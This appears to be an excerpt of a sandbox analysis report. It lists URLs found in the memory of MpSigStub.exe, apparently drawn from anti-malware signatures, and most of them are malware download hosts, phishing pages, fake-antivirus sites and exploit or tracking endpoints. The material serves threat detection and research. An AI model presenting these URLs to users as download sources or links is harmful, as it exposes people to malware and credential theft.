Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000023.00000003.6339973088.0000028BD6769000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000023.00000003.6439529819.0000028BD66E5000.00000004.00000001.sdmp	String found in binary or memory: http://dickswingsgrill.com?
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://dimas.stifar.ac.id/vjrzzufsu/
Source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp	String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000023.00000003.6336769092.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000023.00000003.6422489024.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp	String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://diydaddy.us/cgi-bin/8f_i
Source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp	String found in binary or memory: http://dl.%s/get/?pin=%s&lnd=%s
Source: MpSigStub.exe, 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp	String found in binary or memory: http://dl.360safe.com/gf/360ini.cab
Source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dqwjnewkwefewamail.com/
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.6431685607.0000028BD6D56000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://dl.river-store.com
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000023.00000003.6267325282.0000028BD7515000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000023.00000003.6312829089.0000028BD7178000.00000004.00000001.sdmp	String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000023.00000003.6301785848.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000023.00000003.6343684141.0000028BD6D99000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://docs.herobo.com
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://dokument-9827323724423823.ru/KYSTBANEN.exe
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://dokument-9827323724423823.ru/Telefoncomputernes9.exe
Source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp	String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000023.00000003.6439110180.0000028BD7F7A000.00000004.00000001.sdmp	String found in binary or memory: http://down.admin7a57a5a743894a0e.club/4.exe
Source: MpSigStub.exe, 00000023.00000003.6277926837.0000028BD7CD1000.00000004.00000001.sdmp	String found in binary or memory: http://down.anhuiry.com/
Source: MpSigStub.exe, 00000023.00000003.6431223020.0000028BD7EB4000.00000004.00000001.sdmp	String found in binary or memory: http://down.emoney.cn/wl
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp	String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp	String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/
Source: MpSigStub.exe, 00000023.00000003.6285608853.0000028BD7FD8000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000023.00000003.6285608853.0000028BD7FD8000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000023.00000003.6288686675.0000028BD7BA5000.00000004.00000001.sdmp	String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://download.m
Source: MpSigStub.exe, 00000023.00000003.6432193313.0000028BD6D97000.00000004.00000001.sdmp	String found in binary or memory: http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Source: MpSigStub.exe, 00000023.00000003.6338449567.0000028BD8082000.00000004.00000001.sdmp	String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://download.softobase.com/ru/
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://download.softobase.com/ru/xL
Source: MpSigStub.exe, 00000023.00000003.6285608853.0000028BD7FD8000.00000004.00000001.sdmp	String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000023.00000003.6278531314.0000028BD61AB000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000023.00000003.6264075284.0000028BD8107000.00000004.00000001.sdmp	String found in binary or memory: http://download1.ihyip.pw/
Source: MpSigStub.exe, 00000023.00000003.6346352877.0000028BD65BA000.00000004.00000001.sdmp	String found in binary or memory: http://download1.microliteupdate.net/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp	String found in binary or memory: http://downloader.aldtop.com
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://downloads-full.com.br/
Source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp	String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://downtown.crstycricri.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6269393407.0000028BC3ECC000.00000004.00000001.sdmp	String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
Source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp	String found in binary or memory: http://dr-woelfl.de/invoice-for-you/
Source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp	String found in binary or memory: http://driversearch.space
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp	String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp	String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000023.00000003.6339389691.0000028BD7F38000.00000004.00000001.sdmp	String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://dwaplord2018.tk/doc/purchaseorder.doc
Source: MpSigStub.exe, 00000023.00000003.6268133446.0000028BD6E8E000.00000004.00000001.sdmp	String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp	String found in binary or memory: http://dxcodec.com/uninstall/
Source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp	String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp	String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp	String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://egomam.ru/neworder.doc
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://ekey.sdo.com
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://elpctchair00.net/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp	String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp	String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 00000023.00000003.6290474663.0000028BD5FE4000.00000004.00000001.sdmp	String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000023.00000003.6312196496.0000028BD70F5000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000023.00000003.6271514994.0000028BD76A0000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000023.00000003.6283306166.0000028BD6B04000.00000004.00000001.sdmp	String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000023.00000003.6318060550.0000028BD7A7F000.00000004.00000001.sdmp	String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://enomioms.club/msw/
Source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp	String found in binary or memory: http://erlivia.ltd
Source: MpSigStub.exe, 00000023.00000003.6266211680.0000028BD6B88000.00000004.00000001.sdmp	String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp	String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp	String found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000023.00000003.6283686217.0000028BD64B3000.00000004.00000001.sdmp	String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp	String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp	String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp	String found in binary or memory: http://eula.mindspark.com/eula/
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://evanstechnology.com
Source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp	String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp	String found in binary or memory: http://ewd96h2.sed.macabrepoe.com
Source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp	String found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
Source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp	String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp	String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://experimental.sitesled.com/wind.jpg
Source: MpSigStub.exe, 00000023.00000003.6315036458.0000028BD60E4000.00000004.00000001.sdmp	String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
Source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp	String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 00000023.00000003.6281089235.0000028BD7E5F000.00000004.00000001.sdmp	String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp	String found in binary or memory: http://faacebookv.tk/reveal.php
Source: MpSigStub.exe, 00000023.00000003.6299498937.0000028BD6FED000.00000004.00000001.sdmp	String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 00000023.00000003.6280803860.0000028BD7E31000.00000004.00000001.sdmp	String found in binary or memory: http://faithhotelghana.com
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://faneuil-lawsuit.com/xl.png
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://fast-loads2.name/agreement.php
Source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp	String found in binary or memory: http://fast-loads2.name/agreement.phpxN
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/abc.zip
Source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/xyzx.zip
Source: MpSigStub.exe, 00000023.00000003.6435347740.0000028BD7C0A000.00000004.00000001.sdmp	String found in binary or memory: http://fbcores.info/
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6315606620.0000028BD6CD3000.00000004.00000001.sdmp	String found in binary or memory: http://feed.helperbar.com
Source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp	String found in binary or memory: http://fei-coder.com/
Source: MpSigStub.exe, 00000023.00000003.6438436558.0000028BD7597000.00000004.00000001.sdmp	String found in binary or memory: http://feliz2008.land.ru/iexplore.exe
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://fellatioadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp	String found in binary or memory: http://fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp	String found in binary or memory: http://fen0men.info/exp/index.php
Source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp	String found in binary or memory: http://festival23234.com/flash.php?mode=1
Source: MpSigStub.exe, 00000023.00000003.6433758529.0000028BD7B86000.00000004.00000001.sdmp	String found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000023.00000003.6313262116.0000028BD723F000.00000004.00000001.sdmp	String found in binary or memory: http://fhayazilim.com/wp-admin/
Source: MpSigStub.exe, 00000023.00000003.6309579817.0000028BD8040000.00000004.00000001.sdmp	String found in binary or memory: http://fibrassolpiscinas.com.br/wp-content/upgrabe/
Source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp	String found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
Source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp	String found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
Source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp	String found in binary or memory: http://finance.yahoo.com/
